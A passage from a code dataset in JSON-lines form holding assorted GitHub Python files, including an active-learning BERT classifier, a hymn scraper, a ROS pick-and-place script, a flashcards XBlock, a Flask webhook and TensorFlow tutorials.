logging.warning(\"Importing hyper parameters from file\")\n assert os.path.exists(\"hyper_parameters.json\")\n with open(\"hyper_parameters.json\", \"r\") as f:\n HYPER = json.load(f)\n DEVICE = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n if DEVICE != \"cuda\":\n while True:\n ans = input(\"GPU not detected. Continue using CPU? [y/n] \")\n if ans == \"n\":\n sys.exit(1)\n elif ans == \"y\":\n break\n logging.warning(\"Initializing %s\" % HYPER[\"MODEL\"])\n pipeline = Pipeline(\n [\n (\n \"tokenizer\",\n HuggingfacePretrainedTokenizer(HYPER[\"PRETRAINED_TOKENIZER\"]),\n ),\n (\n \"net\",\n NeuralNetClassifier(\n BertModule,\n module__name=HYPER[\"MODEL\"],\n module__num_labels=len(set(self.dl.y_train)),\n optimizer=eval(HYPER[\"OPTIMIZER\"]),\n lr=HYPER[\"LR\"],\n max_epochs=HYPER[\"MAX_EPOCHS\"],\n criterion=eval(HYPER[\"CRITERION\"]),\n batch_size=HYPER[\"BATCH_SIZE\"],\n iterator_train__shuffle=True,\n device=DEVICE,\n callbacks=[\n EarlyStopping(patience=HYPER[\"PATIENCE\"]),\n LRScheduler(\n LambdaLR, lr_lambda=self.lr_schedule, step_every=\"batch\"\n ),\n ProgressBar(),\n ],\n ),\n ),\n ]\n )\n self.num_training_steps = HYPER[\"MAX_EPOCHS\"] * (\n len(dl.X_train) // HYPER[\"BATCH_SIZE\"] + 1\n )\n logging.warning(\"Fitting %s\" % HYPER[\"MODEL\"])\n self.model = ActiveLearner(\n estimator=pipeline,\n query_strategy=uncertainty_sampling,\n X_training=dl.X_train,\n y_training=dl.y_train,\n )\n # hyper parameters that will be used elsewhere\n self.BATCH_SIZE = HYPER[\"BATCH_SIZE\"]\n self.POOL_SAMPLE_SIZE = HYPER[\"POOL_SAMPLE_SIZE\"]\n logging.warning(\"Model initialized\")\n\n def lr_schedule(self, current_step):\n \"\"\"Returns the learning schedule based on training steps\"\"\"\n factor = float(self.num_training_steps - current_step) / float(\n max(1, self.num_training_steps)\n )\n assert factor > 0\n return factor\n\n def calc_score(self, X, y):\n \"\"\"Calculates the performance of the model\"\"\"\n y_pred = self.model.predict(X)\n metrics = precision_recall_fscore_support(y, y_pred, average=\"weighted\")\n performance = {\n \"precision\": \"{:0.2f}\".format(metrics[0]),\n \"recall\": \"{:0.2f}\".format(metrics[1]),\n \"f1\": \"{:0.2f}\".format(metrics[2]),\n \"balanced accuracy\": \"%0.2f\" % balanced_accuracy_score(y, y_pred),\n }\n return performance\n\n def query_loop(self):\n \"\"\"Active learning loop\"\"\"\n accuracy_scores = [float(self.calc_score(self.dl.X_dev, self.dl.y_dev)[\"f1\"])]\n while len(self.dl.X_pool) >= self.BATCH_SIZE:\n print(f\"ACCURACY\\n{list(enumerate(accuracy_scores))}\")\n # keeps track of annotations for current iteration in loop\n X = np.empty(self.BATCH_SIZE, dtype=object)\n Y = np.zeros(self.BATCH_SIZE, dtype=int)\n\n # shuffle pools of unannotated tweets\n np.random.shuffle(self.dl.X_pool)\n np.random.shuffle(self.dl.y_pool)\n\n # extract samples of POOL_SAMPLE_SIZE from pool\n X_pool_sample = self.dl.X_pool[: self.POOL_SAMPLE_SIZE]\n y_pool_sample = self.dl.y_pool[: self.POOL_SAMPLE_SIZE]\n\n # remove those samples from the pool\n self.dl.X_pool = np.delete(\n self.dl.X_pool, np.arange(self.POOL_SAMPLE_SIZE), axis=0\n )\n self.dl.y_pool = np.delete(\n self.dl.y_pool, np.arange(self.POOL_SAMPLE_SIZE), axis=0\n )\n\n for i in range(self.BATCH_SIZE):\n # query active learner\n query_idx, query_inst = self.model.query(X_pool_sample)\n\n # print query and get input from user regarding annotation\n print(\"\\nANNOTATION %d/%d\" % (i + 1, self.BATCH_SIZE))\n print(query_inst[0])\n X[i] = query_inst[0]\n Y[i] = int(input(\"> \"))\n\n # remove 
tweet from sample so that it won't show up again\n X_pool_sample = np.delete(X_pool_sample, query_idx, axis=0)\n y_pool_sample = np.delete(y_pool_sample, query_idx, axis=0)\n\n # refit model using newly annotated data\n self.model.teach(X, Y)\n\n # calculate new accuracy score and add to history stack\n accuracy_scores.append(\n float(self.calc_score(self.dl.X_dev, self.dl.y_dev)[\"f1\"])\n )\n\n # add unused data back to pool\n self.dl.X_pool = np.concatenate((self.dl.X_pool, X_pool_sample))\n self.dl.y_pool = np.concatenate((self.dl.y_pool, y_pool_sample))\n\n def predict(self, X):\n return self.model.predict(X)\n","repo_name":"skogsgren/bert-eat-dog-world","sub_path":"activebert.py","file_name":"activebert.py","file_ext":"py","file_size_in_byte":7498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"15017123143","text":"import sys\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nfile = open('context1.log', 'ab')\ntry:\n for x in range(1, 401):\n if x < 10:\n xx = '00%d' % x\n elif 10 <= x < 100:\n xx = '0%d' % x\n else:\n xx = x\n url = 'http://www.jonahome.net/files/zmsg/zmsgc/zhanmeishi/Hymn%s.htm' % xx\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\",\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"accept-encoding\": \"gzip, deflate, sdch\",\n \"accept-language\": \"zh-CN,zh;q=0.8\",\n \"Referer\": \"https://www.exploit-db.com/\"\n }\n r = requests.get(url)\n r.encoding = 'gb2312'\n soup = BeautifulSoup(r.text, \"html.parser\")\n\n txt = soup.find('div', class_='TitleLinks').text\n title = txt[txt.find(\"《\"): txt.find(\"》\")+1]\n content = txt[txt.find(\"》\")+1:].replace('\\r\\n', '
')\n sql = \"insert into hymn(hid, title,content) values('%s', %s','%s');\\r\\n\" % (xx, title, content)\n file.write(sql.encode('utf-8'))\n print(x)\n print(url)\nfinally:\n file.close()\n\n\n","repo_name":"aa2288207/PythonScript","sub_path":"Python3/zanmei.py","file_name":"zanmei.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"31448009123","text":"import sys\nimport os\nimport tensorflow as tf\nimport tempfile\nimport moviepy.editor as mpy\nimport numpy as np\nimport uuid\nfrom PIL import Image\nimport os.path as path\n\n\ndef get_experiment_id():\n\n if len(sys.argv) != 2:\n raise Exception('Must provide experiment id or \"new\" keyword')\n\n if sys.argv[1] == 'new':\n return str(uuid.uuid4())\n\n if os.path.exists(os.path.join('output', sys.argv[1])):\n return sys.argv[1]\n\n raise Exception('Can not find experiment {0}'.format(sys.argv[1]))\n\n\ndef get_session(experiment_id):\n session = tf.Session()\n if os.path.exists(os.path.join('output', experiment_id)):\n saver = tf.train.Saver()\n path = os.path.join('output', experiment_id, 'checkpoints')\n latest_checkpoint = tf.train.latest_checkpoint(path)\n saver.restore(session, latest_checkpoint)\n else:\n session.run(tf.global_variables_initializer())\n return session\n\n\ndef create_folders(experiment_id):\n if not os.path.exists('output'):\n os.mkdir(os.path.join('output'))\n\n if not os.path.exists(os.path.join('output', experiment_id)):\n os.mkdir(os.path.join('output', experiment_id))\n os.mkdir(os.path.join('output', experiment_id, 'checkpoints'))\n os.mkdir(os.path.join('output', experiment_id, 'summaries'))\n\n\ndef tensor_to_gif_summ(summ):\n if isinstance(summ, bytes):\n summary_proto = tf.Summary()\n summary_proto.ParseFromString(summ)\n summ = summary_proto\n\n summary = tf.Summary()\n for value in summ.value:\n tag = value.tag\n images_arr = tf.make_ndarray(value.tensor)\n\n if len(images_arr.shape) != 4:\n raise ValueError('Tensors must be 4-D')\n if images_arr.shape[-1] != 1:\n raise ValueError('Tensors must have 1 channel')\n\n # encode sequence of images into gif string\n clip = mpy.ImageSequenceClip(list(images_arr), fps=30)\n with tempfile.NamedTemporaryFile() as f:\n filename = f.name + '.gif'\n clip.write_gif(filename, verbose=False)\n with open(filename, 'rb') as f:\n encoded_image_string = f.read()\n\n image = tf.Summary.Image()\n image.height = images_arr.shape[-3]\n image.width = images_arr.shape[-2]\n image.colorspace = 1 # code for 'RGB'\n image.encoded_image_string = encoded_image_string\n summary.value.add(tag=tag, image=image)\n return summary\n","repo_name":"koryakinp/mldriver-discrete-steering","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24335145948","text":"#!/usr/bin/env python3\nimport sys\nimport copy\nimport rospy\nimport moveit_commander\nimport moveit_msgs.msg\nimport geometry_msgs.msg\nfrom math import pi\nfrom std_msgs.msg import String\nfrom moveit_commander.conversions import pose_to_list\n\n#initialise moveit_commander and a rospy node\nmoveit_commander.roscpp_initialize(sys.argv)\nrospy.init_node('move_group_python_inferace', anonymous=True)\n\n#instantiate a RobotCommander object\nrobot = moveit_commander.RobotCommander()\n\n#instantitate a PlanningSceneInterface object\nscene = moveit_commander.PlanningSceneInterface()\n\n#instantitate 
a MoveGroupCommander object\ngroup_name=\"manipulator\"\nmove_group=moveit_commander.MoveGroupCommander(group_name)\n\n#Create DisplayTrajectory ROS publisher which is used to display trajectories in Rviz\ndisplay_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path', moveit_msgs.msg.DisplayTrajectory, queue_size=20)\n\n#Go to Home Position\nhome = [2.15339e-05, -2.26790, 2.24914, -1.62, -1.6, -0.33310]\nmove_group.set_joint_value_target(home)\nmove_group.go(wait=True)\n\nrospy.sleep(1)\n\n#Go to above source table\nsource = [-3.34562,-1.43934,1.50303,-1.62,-1.6,-0.33310]\nmove_group.set_joint_value_target(source)\nmove_group.go(source, wait=True)\n\nrospy.sleep(1)\n\n#Go to above object on source table\nsource_object = [-0.8616, 0.17825, 1.3065, -0.72637, -0.68707, -0.00936, 0.014766]\nmove_group.set_pose_target(source_object)\nmove_group.go(source_object, wait=True)\n\nrospy.sleep(1)\n\n#Move towards object in z-direction\npickpose = move_group.get_current_pose().pose\npickpose.position.z -= 0.5\nmove_group.set_pose_target(pickpose)\nmove_group.go(pickpose, wait=True)\n\nrospy.sleep(1)\n\n#Move upwards in z-direction\npickpose = move_group.get_current_pose().pose\npickpose.position.z += 0.5\nmove_group.set_pose_target(pickpose)\nmove_group.go(pickpose, wait=True)\n\nrospy.sleep(1)\n\n#Move above assembly table\nassembly = [-1.53122, -1.22303, 1.22964, -1.62, -1.6, -0.33310]\nmove_group.set_joint_value_target(assembly)\nmove_group.go(assembly, wait=True)\n\nrospy.sleep(1)\n\n#Move above plate on assembly table\nassembly_plate = [-1.78539, -1.29920, 1.31691, -1.62, -1.6, -0.33310]\nmove_group.set_pose_target(assembly_plate)\nmove_group.go(assembly_plate)\n\n#Move towards object in z-direction\nplacepose = move_group.get_current_pose().pose\nplacepose.position.z -= 0.5\nmove_group.set_pose_target(placepose)\nmove_group.go(placepose, wait=True)\n\nrospy.sleep(1)\n\n#Move upwards in z-direction\nplacepose = move_group.get_current_pose().pose\nplacepose.position.z += 0.5\nmove_group.set_pose_target(placepose)\nmove_group.go(placepose, wait=True)\n\nrospy.sleep(1)\n\n#Return to Home Position\nmove_group.set_joint_value_target(home)\nmove_group.go(wait=True)\n\nmove_group.stop()","repo_name":"MacaJJ/UR10_Robotiq_Workspace","sub_path":"src/myur10sim/myur10_moveit_config/scripts/pick_place_move_group.py","file_name":"pick_place_move_group.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21175950822","text":"\"\"\"\nDefines all losses related functions\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom rnnvis.rnn.varlen_support import last_relevant\n\n\ndef softmax(x, axis=None):\n if axis is None:\n x_max = np.max(x)\n e_x = np.exp(x - x_max)\n return e_x / np.sum(e_x)\n if axis == 1:\n x = x.T\n x_max = np.max(x, axis=0)\n e_x = np.exp(x - x_max)\n sm = e_x / np.sum(e_x, axis=0)\n return sm if axis == 0 else sm.T\n\n\ndef sequence_loss(outputs, targets):\n \"\"\"\n Weighted cross-entropy loss for a sequence of logits (per example).\n :param outputs: a 2D Tensor of shape [batch_size, output_size]\n :param targets: a 1D int32 Tensors of shape [batch_size]\n :return: a scalar tensor denoting the average loss of each example\n \"\"\"\n if len(outputs.get_shape()) == 2:\n flatten_shape = tf.shape(targets)\n elif len(outputs.get_shape()) == 3:\n shape = outputs.get_shape().as_list()\n outputs = tf.reshape(outputs, [-1, shape[2]])\n targets = tf.reshape(targets, 
[-1])\n flatten_shape = tf.shape(targets)\n else:\n raise ValueError(\"outputs must be 2D or 3D tensor!\")\n _loss = tf.nn.seq2seq.sequence_loss([outputs], [targets], [tf.ones(flatten_shape, dtype=outputs.dtype)])\n return _loss\n\n\ndef sentence_loss(last_outputs, targets):\n return sequence_loss(last_outputs, targets)\n","repo_name":"myaooo/RNNVis","sub_path":"rnnvis/rnn/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":173,"dataset":"github-code","pt":"7"} +{"seq_id":"16062360450","text":"\"\"\"\n Flashcards XBlock allowes the editor to add a list of quesitions and\n answers (separated by a semicolon) which are then displayed as flashcards.\n\"\"\"\n\nimport pkg_resources\n\nfrom xblock.core import XBlock\nfrom xblock.fields import Scope, Dict, String\nfrom xblock.fragment import Fragment\n\nfrom lxml import etree\n\nfrom jinja2 import Environment, PackageLoader\n\nenv = Environment(loader=PackageLoader('flashcards', 'static/html'))\n\n\nclass FlashcardsXBlock(XBlock):\n \"\"\"\n The content (the values between the tags) is saved as a\n dictionary and passed as a dictionary to the HTML template\n \"\"\"\n title = String(\n default=u\"Flashcards title\",\n scope=Scope.settings,\n help=u\"Title of the flashcards block\"\n )\n\n content = Dict(\n default={},\n scope=Scope.settings,\n help=u\"List of items\"\n )\n\n\n def resource_string(self, path):\n \"\"\"Handy helper for getting resources from our kit.\"\"\"\n data = pkg_resources.resource_string(__name__, path)\n return data.decode(\"utf8\")\n\n\n def student_view(self, context=None):\n \"\"\"Create fragment and send the appropriate context.\"\"\"\n context = {\n 'flashcards': self.content,\n 'title': self.title,\n }\n\n frag = Fragment()\n template = env.get_template(\"flashcards.html\")\n frag.add_content(template.render(**context))\n frag.add_css(self.resource_string(\"static/css/flashcards.css\"))\n frag.add_javascript(self.resource_string(\"static/js/src/flashcards.js\"))\n frag.initialize_js('FlashcardsXBlock')\n return frag\n\n @classmethod\n def parse_xml(cls, node, runtime, keys, id_generator):\n \"\"\"\n Parse the XML for an HTML block.\n\n The entire subtree under `node` is re-serialized, and set as the\n content of the XBlock.\n\n The content between the blocks is being transformed\n into a dictionary, and as such saved into the content class variable\n (which is accessable with self.content)\n \"\"\"\n block = runtime.construct_xblock_from_class(cls, keys)\n flashcards = {}\n\n for element in node.iter(\"flashcard\"):\n flashcards[element.attrib[\"front\"]] = element.attrib[\"back\"]\n\n block.content = flashcards\n block.title = node.attrib['title']\n return block\n\n\n @staticmethod\n def workbench_scenarios():\n \"\"\"A canned scenario for display in the workbench.\"\"\"\n return [\n (\"FlashcardsXBlock\",\n \"\"\"\n \n\n\n \n \n \"\"\"),\n ]\n\n def studio_view(self, context):\n \"\"\"Create a fragment used to display the edit view in the Studio.\"\"\"\n\n context = {\n 'flashcards': self.content,\n 'title': self.title,\n }\n\n frag = Fragment()\n template = env.get_template('flashcards_edit.html')\n frag.add_content(template.render(**context))\n frag.add_css(self.resource_string(\"static/css/flashcards_edit.css\"))\n frag.add_javascript(self.resource_string(\"static/js/src/flashcards_edit.js\"))\n frag.initialize_js('FlashcardsEditXBlock')\n return frag\n\n @XBlock.json_handler\n def studio_submit(self, data, suffix=''):\n 
\"\"\"Called when submitting the form in Studio.\"\"\"\n self.title = data.get('title')\n \n flashcards = {}\n\n fclist = data.get('flashcards').items()\n fclist.reverse() # print out the list in the same order as entered\n for item in fclist:\n front, back = item\n flashcards[front] = back \n\n self.content = flashcards\n\n return {'result':'success'}","repo_name":"vkaracic/FlashcardsXBlock","sub_path":"flashcards/flashcards.py","file_name":"flashcards.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"7681665297","text":"\"\"\"Different types of inheritance based upon parent and child classes\"\"\"\n\n\n# Single Inheritance\nclass Vehicle:\n def set_top_speed(self, speed):\n self.top_speed = speed\n print(f\"Top speed is set to: {self.top_speed}\")\n\n\nclass Car(Vehicle):\n def open_trunk(self):\n print(\"Trunk is now open\")\n\n\ncorolla = Car()\ncorolla.set_top_speed(220)\ncorolla.open_trunk()\n\n\n# Multi-level Inheritance\nclass Hybrid(Car):\n def turn_on_hybrid(self):\n print(\"Hybrid mode is now switched on!\")\n\n\npriusPrime = Hybrid()\npriusPrime.set_top_speed(250)\npriusPrime.open_trunk()\npriusPrime.turn_on_hybrid()\n\n\n# Hierarchical Inheritance\nclass Truck(Vehicle):\n def identity(self):\n print(\"This is a Truck\")\n\n\neicher = Truck()\neicher.identity()\n\n\n# Hybrid Inheritance\nclass Engine:\n def set_power(self, power):\n self.power = power\n\n\n# Multiple Inheritance\nclass CombustionEngine(Engine):\n def set_tank_capacity(self, tank_capacity):\n self.tank_capacity = tank_capacity\n\n\nclass ElectricEngine(Engine):\n def set_charge_capacity(self, charge_capacity):\n self.charge_capacity = charge_capacity\n\n\nclass HybridEngine(CombustionEngine, ElectricEngine):\n def print_details(self):\n print(f\"Power: {self.power}\")\n print(f\"Tank Capacity: {self.tank_capacity}\")\n print(f\"Charge Capacity: {self.charge_capacity}\")\n\n\ncar = HybridEngine()\ncar.set_power(\"2000 cc\")\ncar.set_charge_capacity(\"250 W\")\ncar.set_tank_capacity(\"20 Litres\")\ncar.print_details()\n","repo_name":"Maulik5041/Python_practice","sub_path":"Object Oriented Programming/Inheritance/types_of_inheritance.py","file_name":"types_of_inheritance.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23119465013","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.cluster import MeanShift, estimate_bandwidth\n\nfilename = './iris_data.csv'\n\ndf = pd.read_csv(filename, decimal=',')\n\nlabels_unique = df['Species'].unique()\ncolours = ['red', 'orange', 'green']\n\n\ndef scatter_plot():\n\n for i in range(0, 3):\n value = labels_unique[i]\n species_df = df.loc[df['Species'] == value]\n plt.scatter(\n species_df['Petal length'],\n species_df['Petal width'],\n color=colours[i],\n alpha=0.5,\n label=labels_unique[i]\n )\n\n plt.xlabel('sepal length')\n plt.ylabel('petal length')\n plt.title('petal length vs sepal length')\n\n\n return plt\n\n# scatter_plot()\n\n\ndata = df.drop(['Species'], axis=1)\n\ndef mean_shift(data, n_samples=1000):\n bandwidth = estimate_bandwidth(data, quantile=0.2, n_samples=n_samples)\n\n ms = MeanShift(bandwidth=bandwidth, bin_seeding=True)\n ms.fit(data)\n labels = ms.labels_\n cluster_centers = ms.cluster_centers_\n\n labels_unique = np.unique(labels)\n n_clusters = len(labels_unique)\n\n print('labels: 
{}'.format(labels))\n print('Number of estimated clusters : {}'.format(n_clusters))\n print('Cluster centers: {}'.format(cluster_centers))\n return labels, cluster_centers, n_clusters\n\n\nms = mean_shift(data)\n\ndef ms_plot(data):\n labels = data[0]\n cluster_centers = data[1]\n\n scatter_plot()\n\n plt.scatter(\n cluster_centers[0],\n cluster_centers[1],\n color=\"black\",\n alpha=1,\n )\n\n plt.show()\n\n \nms_plot(ms)\n\n\n","repo_name":"JesperHA/sem4python","sub_path":"week 10/exercise-iris.py","file_name":"exercise-iris.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25369617733","text":"import os\nimport random\nfrom datetime import date\n\nfrom flask import Blueprint, Response, request\n\nfrom utils.hellotracks.client import HellotracksClient\nfrom utils.wunder.client import WunderClient\n\nhellotracks = Blueprint(name=\"hellotracks\", import_name=__name__)\n\nht = HellotracksClient(user=os.environ.get(\"HELLOTRACKS_USER\"),\n api_key=os.environ.get(\"HELLOTRACKS_API\"))\nwm = WunderClient(api_key=os.environ.get(\"WUNDER_BACKEND_API_KEY\"))\n\n\n@hellotracks.route('/create_job', methods=['POST'])\ndef create_job():\n event_name = request.json[\"eventName\"]\n data = request.json[\"data\"]\n\n if event_name == \"backend\\\\models\\\\VehicleStateChange::afterInsert\" \\\n and data[\"from\"] != \"fuel level low\" and data[\"to\"] == \"fuel level low\":\n\n vehicle_id = data[\"vehicleId\"]\n vehicle = wm.get_vehicle(vehicle_id=vehicle_id)\n\n if request.args.get(\"random_locations\") == \"1\":\n lat = random.uniform(51.47690572136774, 51.538636920666406)\n lng = random.uniform(-0.18411568297429584, -0.07517897752823008)\n else:\n lat = vehicle.get(\"lat\", 0)\n lng = vehicle.get(\"lon\", 0)\n\n job = ht.create_job_object(\n job_type=0,\n day=int(date.today().strftime('%Y%m%d')),\n destination_lat=lat,\n destination_lng=lng,\n destination_name=\"Fuel Level Low\",\n custom_attributes={\n \"vehicle_id\": vehicle_id,\n \"mileage\": vehicle.get(\"mileage\")\n }\n )\n\n ht.create_jobs(job_list=[job])\n\n return Response(status=200)\n","repo_name":"jduartea/dracaena","sub_path":"blueprints/hellotracks.py","file_name":"hellotracks.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42431287101","text":"#!/usr/bin/python\n# encoding: utf-8\n# author: Charles Joly Beauparlant\n# 2015-05-11\n\nimport sys\nimport os\n\nfrom lib.Step import *\n\nclass PeakCall(Step):\n def _set_step_specific_values(self):\n self.name = __name__.split('.')[1]\n self.design_status = True\n\n def _get_command(self, dependencies, outputs):\n command = \"\\tmacs2 callpeak \\\\\\n\"\n command += \"\\t\\t-t \"\n command += \" \".join(dependencies[0].unlist())\n command += \" \\\\\\n\"\n command += \"\\t\\t-c \"\n command += \" \".join(dependencies[1].unlist())\n command += \" \\\\\\n\"\n command += \"\\t\\t-f BAM \\\\\\n\"\n command += \"\\t\\t-g \" + self.params['gsize']\n if self.params['extra'] is not None:\n command += \" \\\\\\n\"\n command += \"\\t\\t\" + self.params['extra']\n return(command)\n\n def _set_default_params(self):\n self.params['dir_name'] = 'peaks'\n self.params['suffix'] = '_peaks.narrowPeak'\n self.params['gsize'] = \"hs\"\n self.params['extra'] = None\n\n def _validate_param_step_specific(self, inputs, outputs):\n 
pass\n","repo_name":"CharlesJB/MakefileMaker","sub_path":"Steps/PeakCall.py","file_name":"PeakCall.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41889120241","text":"from .calculate_dependencies import *\nfrom collections import Counter\nfrom .calculate_base import calculate_base\n\nclass calculate_count(calculate_base):\n \n # counts and reducers\n def count_elements(self,data_I):\n '''count the number of occurances of a elements\n INPUT:\n data_I = list of data with multiple elements\n OUTPUT:\n elements_unique_O = list of unique elements\n elements_count_O = list of feature counts\n elements_count_fraction_O = list of feature counts expressed as a fraction of the total\n '''\n cnt = Counter();\n #count the occurances of the feature\n for d in data_I:\n cnt[d] += 1;\n #extract the unique features and counts\n elements_unique_O = [];\n elements_count_O = [];\n elements_count_fraction_O = [];\n count_sum = sum(cnt.values());\n for element in list(cnt):\n elements_unique_O.append(element);\n elements_count_O.append(cnt[element]);\n elements_count_fraction_O.append(cnt[element]/count_sum);\n return elements_unique_O,elements_count_O,elements_count_fraction_O;\n","repo_name":"dmccloskey/python_statistics","sub_path":"python_statistics/calculate_count.py","file_name":"calculate_count.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26311459506","text":"\"\"\"\nCP1404/CP5632 Practical\nData file -> lists program\n\"\"\"\n\nFILENAME = \"subject_data.txt\"\n\n\ndef main():\n longest_length_name=0\n longest_length_students_count=0\n data = get_data()\n print(data)\n for list in data:\n if len(list[1]) > longest_length_name:\n longest_length_name = len(list[1])\n if len(list[2]) > longest_length_students_count:\n longest_length_students_count = len(list[2])\n for list in data:\n print(f\"{list[0]} is taught by {list[1]:<{longest_length_name}} and has {list[2]:>{longest_length_students_count}} students\")\n\n\n\ndef get_data():\n \"\"\"Read data from file formatted like: subject,lecturer,number of students.\"\"\"\n input_file = open(FILENAME)\n list_of_subjects =[]\n for line in input_file:\n line = line.strip()\n line = line.split(\",\")\n list_of_subjects.append(line)\n # print(line) # See what a line looks like\n # print(repr(line)) # See what a line really looks like\n # line = line.strip() # Remove the \\n\n # parts = line.split(',') # Separate the data into its parts\n # print(parts) # See what the parts look like (notice the integer is a string)\n # parts[2] = int(parts[2]) # Make the number an integer (ignore PyCharm's warning)\n # print(parts) # See if that worked\n # print(\"----------\")\n input_file.close()\n return list_of_subjects\n\nmain()","repo_name":"IanEllimanJCU/cp1404practicals","sub_path":"prac_04/subject_reader.py","file_name":"subject_reader.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"719576828","text":"#coding:utf-8\nimport tensorflow as tf \nimport numpy as np\nimport matplotlib.pyplot as plt #pyhton中输出结果可视化模块\n\n#定义添加神经层的函数def add_layer(),它有四个参数:\n#输入值、输入的大小、输出的大小和激励函数,我们设定默认的激励函数是None\ndef add_layer(inputs,input_size,output_seiz,n_layer,activation_function = None):\t\n\tlayer_name = \"layer%s\" %n_layer\n\twith 
tf.name_scope(\"layer_name\"):\n\t\t#开始定义weights和biases\n\t\twith tf.name_scope('Weights'):\n\t\t\tWeights = tf.Variable(tf.random_normal([input_size,output_seiz]),name = \"W\")#in_size行, out_size列的随机变量矩阵\n\t\t\ttf.summary.histogram(layer_name+\"/Weights\",Weights) #添加后可以观看变化的变量\n\t\t#机器学习中,biases的推荐值不为0,所以我们这里是在0向量的基础上又加了0.1\n\t\twith tf.name_scope('Biases'):\n\t\t\tbiases = tf.Variable(tf.zeros([1,output_seiz])+0.1,name = \"b\")\n\t\t\ttf.summary.histogram(layer_name+\"/Biases\",biases)\n\t\t#定义神经网络未激活的值。tf.matmul()是矩阵的乘法。\n\t\twith tf.name_scope('Wx_plus_b'):\n\t\t\tWx_plus_b = tf.matmul(inputs,Weights)+biases\n\t\t\ttf.summary.histogram(layer_name+\"/Wx_plus_b\",Wx_plus_b)\n\t\t#当activation_function——激励函数为None时,输出就是当前的预测值——Wx_plus_b,\n\t\t#不为None时,就把Wx_plus_b传到activation_function()函数中得到输出\n\t\tif activation_function is None:\n\t\t\t# None 表示线性关系 无需激励函数\n\t\t\toutput_seiz = Wx_plus_b\n\t\telse:\n\t\t\toutput_seiz = activation_function(Wx_plus_b)\n\n\t\t# 返回输出 添加一个神经层的函数——def add_layer()就定义好了。\n\t\ttf.summary.histogram(layer_name+\"/output_seiz\",output_seiz) #添加后可以观看变化的变量\n\t\treturn output_seiz\n\n\nx_data = np.linspace(-1,1,300)[:,np.newaxis] #-1到1这个区间里有300个单位,维度 二维\nnoise = np.random.normal(0, 0.05, x_data.shape).astype(np.float32) #噪点\ny_data = np.square(x_data)-0.5 #x_data的二次放 - 0.5\n\n#输入\nwith tf.name_scope(\"inputs_layer\"):\n\tx_input = tf.placeholder(tf.float32,[None,1],name = \"x_input\")\n\n\ty_input = tf.placeholder(tf.float32,[None,1],name = \"y_input\")\n\n\n#简单的三层神经网络:\n# 输入层1个神经元 | 隐藏层假设10个神经元 | 输出层1个神经元\n\n#定义隐藏层\nlayer_hint = add_layer(x_input,1,10,n_layer = 1,activation_function = tf.nn.relu)\n\n#定义输出层\nlayer_output = add_layer(layer_hint,10,1,n_layer =2,activation_function = None)\nwith tf.name_scope(\"loss\"):\n\tloss =tf.reduce_mean(tf.reduce_sum(tf.square(y_input - layer_output),reduction_indices=[1]),name = \"loss\")#二者差的平方求和再取平均\n\ttf.summary.scalar(\"loss\",loss)\n\n#每一个练习的步骤 通过 优化器以0.1的学习效率对误差进行更正提升,下一次就会有更好的结果。\nwith tf.name_scope(\"train_step\"):\n\ttrain_step = tf.train.GradientDescentOptimizer(0.1).minimize(loss)\n\n#初始\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n\t#合并打包 summary 到文件中\n\tmerged = tf.summary.merge_all()\n\t#把整个框架加载到文件中去,在通过浏览器观看这个文件 sess.graph 收集信息,并放在该文件中\n\twriter = tf.summary.FileWriter(\"logs/\",sess.graph)\n\tsess.run(init)\n\t# #先生成图片框\n\t# fig = plt.figure()\n\t# ax = fig.add_subplot(1,1,1)#做连续性的画图\n\t# #plot上真实数据\n\t# ax.scatter(x_data,y_data)\n\t# plt.ion()\n\t# #打印输出\n\t# plt.show()\n\tfor i in range(1000):\n\t\tsess.run(train_step, feed_dict={x_input:x_data,y_input:y_data})\n\t\tif i% 50:\n\t\t\tresult = sess.run(merged,feed_dict={x_input:x_data,y_input:y_data}) #返回一个 summary \n\t\t\t#将summary 放进 writer 里面\n\t\t\twriter.add_summary(result,i)\n\t\t\t# try:\n\t\t\t# \t#抹去上面一条线\n\t\t\t# \tax.lines.remove(lines[0])\n\t\t\t# except Exception:\n\t\t\t# \tpass\n\t\t\t# #显示出预测数据\n\t\t\t# prediction_value = sess.run(layer_output,feed_dict={x_input:x_data})\n\t\t\t# #通过曲线形式plot上去 宽度为5的红色的线\n\t\t\t# lines = 